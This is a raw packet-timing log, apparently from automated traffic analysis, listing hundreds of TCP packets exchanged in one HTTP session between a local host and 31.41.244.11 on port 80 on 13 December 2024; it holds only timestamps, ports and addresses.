Dec 13, 2024 18:53:30.748737097 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.749653101 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.749718904 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.749752998 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.749830008 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.753699064 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.753737926 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.753772974 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.753806114 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.755065918 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.755125046 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.755218029 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.755271912 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.757529974 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.757591009 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.757620096 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.757673979 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.759984016 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.760049105 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.760178089 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.760234118 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.762497902 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.762564898 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.762643099 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.762779951 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.764935017 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.764990091 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.765016079 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.765045881 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.767348051 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.767421007 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.767442942 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.767503977 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.769670010 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.769731998 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.769773960 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.769833088 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.772026062 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.772100925 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.772141933 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.772202015 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.774139881 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.774202108 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.774281025 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.774338007 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.776272058 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.776334047 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.776408911 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.776465893 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.778449059 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.778511047 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.778672934 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.778733969 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.780440092 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.780512094 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.780596018 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.780653954 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.782433033 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.782499075 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.782552004 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.782609940 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.784678936 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.784743071 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.784842014 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.784898996 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.786273956 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.786344051 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.786439896 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.786523104 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.788146973 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.788216114 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.788223982 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.788280964 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.790066957 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.790132999 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.790165901 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.790224075 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.791726112 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.791836023 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.791845083 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.791893959 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.793598890 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.793669939 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.793746948 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.793812037 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.795346022 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.795409918 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.795459986 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.795516014 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.796796083 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.796859026 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.796938896 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.796996117 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.798454046 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.798517942 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.798544884 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.798602104 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.800164938 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.800228119 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.800384045 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.800442934 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.801672935 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.801784039 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.801805973 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.801923990 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.803308010 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.803390980 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.803484917 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.803543091 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.804805994 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.804877996 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.804944038 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.805006027 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.806372881 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.806444883 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.806497097 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.806555986 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.807915926 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.807981968 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.807986975 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.808043957 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.809542894 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.809617996 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.809623003 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.809680939 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.810726881 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.810926914 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.810959101 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.810981035 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.812417984 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.812506914 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.812525034 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.812583923 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.813786030 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.813848972 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.813863993 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.813920975 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.814965010 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.815022945 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.815097094 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.815150023 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.816351891 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.816407919 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.816543102 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.816595078 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.817718983 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.817774057 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.817848921 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.817907095 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.819082022 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.819138050 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.819211960 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.819263935 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.820662022 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.820718050 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.820760965 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.820812941 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.821768045 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.821826935 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.821919918 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.821976900 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.823213100 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.823276997 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.823375940 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.823430061 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.824369907 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.824423075 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.824501038 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.824553967 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.825818062 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.825872898 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.825946093 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.825999022 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.827178955 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.827236891 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.827346087 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.827404022 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.828618050 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.828675032 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.828749895 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.828804970 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.830074072 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.830128908 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.830219984 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.830274105 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.831505060 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.831597090 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.831677914 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.831737041 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.832882881 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.832948923 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.833043098 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.833101988 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.834213018 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.834276915 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.834388018 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.834443092 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.835546970 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.835603952 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.835609913 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.835661888 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.836787939 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.836858034 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.836910009 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.836963892 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.838105917 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.838170052 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.838218927 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.838272095 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.839106083 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.839169025 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.839219093 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.839274883 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.840082884 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.840173960 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.840199947 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.840310097 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.841137886 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.841197968 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.841346025 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.841413975 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.842319012 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.842380047 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.842416048 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.842515945 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.843395948 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.843451023 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.843482018 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.843533039 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.844540119 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.844609022 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.844677925 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.844738007 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.845736027 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.845798016 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.846002102 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.846064091 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.846915007 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.846978903 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.847013950 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.847074032 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.848202944 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.848268032 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.848321915 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.848378897 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.849383116 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.849441051 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.849446058 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.849494934 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.850606918 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.850667953 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.850809097 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.850867987 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.852052927 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.852117062 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.852247000 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.852307081 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.853152990 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.853260040 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.853348017 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.853406906 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.854223967 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.854293108 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.854351044 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.854408979 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.855370045 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.855448961 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.855500937 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.855561018 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.856440067 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.856504917 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.856534958 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.856591940 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.857547998 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.857604980 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.857611895 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.857660055 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.858779907 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.858841896 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.858870983 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.858928919 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.859914064 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.859976053 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.860049963 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.860107899 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.860976934 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.861047029 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.861123085 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.861181021 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.862117052 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.862181902 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.862270117 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.862328053 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.863519907 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.863585949 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.863625050 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.863682032 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.864387989 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.864450932 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.864506006 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.864563942 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.865513086 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.865577936 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.865618944 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.865674019 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.868513107 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.868577003 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.868613958 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.868670940 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.869036913 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.869113922 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.869172096 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.869230986 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.870266914 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.870333910 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.870343924 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.870394945 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.871243000 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.871309042 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.871395111 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.871494055 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.873718023 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.873790979 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.873794079 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.873871088 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.874073029 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.874135017 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.874216080 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.874274969 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.875147104 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.875221014 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.875246048 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.875308037 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.876216888 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.876279116 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.876358032 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.876415968 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.878132105 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.878174067 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.878199100 CET	49864	80	192.168.2.7	31.41.244.11
